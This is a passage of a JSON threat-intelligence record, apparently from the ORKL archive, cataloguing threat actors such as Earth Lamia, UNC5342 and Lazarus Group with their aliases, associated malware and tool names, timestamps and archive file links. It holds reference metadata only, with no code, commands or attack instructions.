				"RATANKBA",
				"Bankshot"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "650a9c54-160c-4a25-8e96-e845f2dd6f82",
			"created_at": "2026-01-18T02:00:03.063535Z",
			"updated_at": "2026-04-10T02:00:03.901997Z",
			"deleted_at": null,
			"main_name": "Earth Lamia",
			"aliases": [
				"UNC5454"
			],
			"source_name": "MISPGALAXY:Earth Lamia",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "376d1479-0ddf-477c-96eb-afdd8f365fec",
			"created_at": "2026-01-20T02:00:03.662195Z",
			"updated_at": "2026-04-10T02:00:03.913032Z",
			"deleted_at": null,
			"main_name": "UNC5342",
			"aliases": [],
			"source_name": "MISPGALAXY:UNC5342",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f32df445-9fb4-4234-99e0-3561f6498e4e",
			"created_at": "2022-10-25T16:07:23.756373Z",
			"updated_at": "2026-04-10T02:00:04.739611Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"APT-C-26",
				"ATK 3",
				"Appleworm",
				"Citrine Sleet",
				"DEV-0139",
				"Diamond Sleet",
				"G0032",
				"Gleaming Pisces",
				"Gods Apostles",
				"Gods Disciples",
				"Group 77",
				"Guardians of Peace",
				"Hastati Group",
				"Hidden Cobra",
				"ITG03",
				"Jade Sleet",
				"Labyrinth Chollima",
				"Lazarus Group",
				"NewRomanic Cyber Army Team",
				"Operation 99",
				"Operation AppleJeus",
				"Operation AppleJeus sequel",
				"Operation Blockbuster: Breach of Sony Pictures Entertainment",
				"Operation CryptoCore",
				"Operation Dream Job",
				"Operation Dream Magic",
				"Operation Flame",
				"Operation GhostSecret",
				"Operation In(ter)caption",
				"Operation LolZarus",
				"Operation Marstech Mayhem",
				"Operation No Pineapple!",
				"Operation North Star",
				"Operation Phantom Circuit",
				"Operation Sharpshooter",
				"Operation SyncHole",
				"Operation Ten Days of Rain / DarkSeoul",
				"Operation Troy",
				"SectorA01",
				"Slow Pisces",
				"TA404",
				"TraderTraitor",
				"UNC2970",
				"UNC4034",
				"UNC4736",
				"UNC4899",
				"UNC577",
				"Whois Hacking Team"
			],
			"source_name": "ETDA:Lazarus Group",
			"tools": [
				"3CX Backdoor",
				"3Rat Client",
				"3proxy",
				"AIRDRY",
				"ARTFULPIE",
				"ATMDtrack",
				"AlphaNC",
				"Alreay",
				"Andaratm",
				"AngryRebel",
				"AppleJeus",
				"Aryan",
				"AuditCred",
				"BADCALL",
				"BISTROMATH",
				"BLINDINGCAN",
				"BTC Changer",
				"BUFFETLINE",
				"BanSwift",
				"Bankshot",
				"Bitrep",
				"Bitsran",
				"BlindToad",
				"Bookcode",
				"BootWreck",
				"BottomLoader",
				"Brambul",
				"BravoNC",
				"Breut",
				"COLDCAT",
				"COPPERHEDGE",
				"CROWDEDFLOUNDER",
				"Castov",
				"CheeseTray",
				"CleanToad",
				"ClientTraficForwarder",
				"CollectionRAT",
				"Concealment Troy",
				"Contopee",
				"CookieTime",
				"Cyruslish",
				"DAVESHELL",
				"DBLL Dropper",
				"DLRAT",
				"DRATzarus",
				"DRATzarus RAT",
				"Dacls",
				"Dacls RAT",
				"DarkComet",
				"DarkKomet",
				"DeltaCharlie",
				"DeltaNC",
				"Dembr",
				"Destover",
				"DoublePulsar",
				"Dozer",
				"Dtrack",
				"Duuzer",
				"DyePack",
				"ECCENTRICBANDWAGON",
				"ELECTRICFISH",
				"Escad",
				"EternalBlue",
				"FALLCHILL",
				"FYNLOS",
				"FallChill RAT",
				"Farfli",
				"Fimlis",
				"FoggyBrass",
				"FudModule",
				"Fynloski",
				"Gh0st RAT",
				"Ghost RAT",
				"Gopuram",
				"HARDRAIN",
				"HIDDEN COBRA RAT/Worm",
				"HLOADER",
				"HOOKSHOT",
				"HOPLIGHT",
				"HOTCROISSANT",
				"HOTWAX",
				"HTTP Troy",
				"Hawup",
				"Hawup RAT",
				"Hermes",
				"HotCroissant",
				"HotelAlfa",
				"Hotwax",
				"HtDnDownLoader",
				"Http Dr0pper",
				"ICONICSTEALER",
				"Joanap",
				"Jokra",
				"KANDYKORN",
				"KEYMARBLE",
				"Kaos",
				"KillDisk",
				"KillMBR",
				"Koredos",
				"Krademok",
				"LIGHTSHIFT",
				"LIGHTSHOW",
				"LOLBAS",
				"LOLBins",
				"Lazarus",
				"LightlessCan",
				"Living off the Land",
				"MATA",
				"MBRkiller",
				"MagicRAT",
				"Manuscrypt",
				"Mimail",
				"Mimikatz",
				"Moudour",
				"Mydoom",
				"Mydoor",
				"Mytob",
				"NACHOCHEESE",
				"NachoCheese",
				"NestEgg",
				"NickelLoader",
				"NineRAT",
				"Novarg",
				"NukeSped",
				"OpBlockBuster",
				"PCRat",
				"PEBBLEDASH",
				"PLANKWALK",
				"POOLRAT",
				"PSLogger",
				"PhanDoor",
				"Plink",
				"PondRAT",
				"PowerBrace",
				"PowerRatankba",
				"PowerShell RAT",
				"PowerSpritz",
				"PowerTask",
				"Preft",
				"ProcDump",
				"Proxysvc",
				"PuTTY Link",
				"QUICKRIDE",
				"QUICKRIDE.POWER",
				"Quickcafe",
				"QuiteRAT",
				"R-C1",
				"ROptimizer",
				"Ratabanka",
				"RatabankaPOS",
				"Ratankba",
				"RatankbaPOS",
				"RawDisk",
				"RedShawl",
				"Rifdoor",
				"Rising Sun",
				"Romeo-CoreOne",
				"RomeoAlfa",
				"RomeoBravo",
				"RomeoCharlie",
				"RomeoCore",
				"RomeoDelta",
				"RomeoEcho",
				"RomeoFoxtrot",
				"RomeoGolf",
				"RomeoHotel",
				"RomeoMike",
				"RomeoNovember",
				"RomeoWhiskey",
				"Romeos",
				"RustBucket",
				"SHADYCAT",
				"SHARPKNOT",
				"SIGFLIP",
				"SIMPLESEA",
				"SLICKSHOES",
				"SORRYBRUTE",
				"SUDDENICON",
				"SUGARLOADER",
				"SheepRAT",
				"SierraAlfa",
				"SierraBravo",
				"SierraCharlie",
				"SierraJuliett-MikeOne",
				"SierraJuliett-MikeTwo",
				"SimpleTea",
				"SimplexTea",
				"SmallTiger",
				"Stunnel",
				"TAINTEDSCRIBE",
				"TAXHAUL",
				"TFlower",
				"TOUCHKEY",
				"TOUCHMOVE",
				"TOUCHSHIFT",
				"TOUCHSHOT",
				"TWOPENCE",
				"TYPEFRAME",
				"Tdrop",
				"Tdrop2",
				"ThreatNeedle",
				"Tiger RAT",
				"TigerRAT",
				"Trojan Manuscript",
				"Troy",
				"TroyRAT",
				"VEILEDSIGNAL",
				"VHD",
				"VHD Ransomware",
				"VIVACIOUSGIFT",
				"VSingle",
				"ValeforBeta",
				"Volgmer",
				"Vyveva",
				"W1_RAT",
				"Wana Decrypt0r",
				"WanaCry",
				"WanaCrypt",
				"WanaCrypt0r",
				"WannaCry",
				"WannaCrypt",
				"WannaCryptor",
				"WbBot",
				"Wcry",
				"Win32/KillDisk.NBB",
				"Win32/KillDisk.NBC",
				"Win32/KillDisk.NBD",
				"Win32/KillDisk.NBH",
				"Win32/KillDisk.NBI",
				"WinorDLL64",
				"Winsec",
				"WolfRAT",
				"Wormhole",
				"YamaBot",
				"Yort",
				"ZetaNile",
				"concealment_troy",
				"http_troy",
				"httpdr0pper",
				"httpdropper",
				"klovbot",
				"sRDI"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434030,
	"ts_updated_at": 1775792299,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5d2bba227ea31c26a295bca051517ab9d8c9d11e.pdf",
		"text": "https://archive.orkl.eu/5d2bba227ea31c26a295bca051517ab9d8c9d11e.txt",
		"img": "https://archive.orkl.eu/5d2bba227ea31c26a295bca051517ab9d8c9d11e.jpg"
	}
}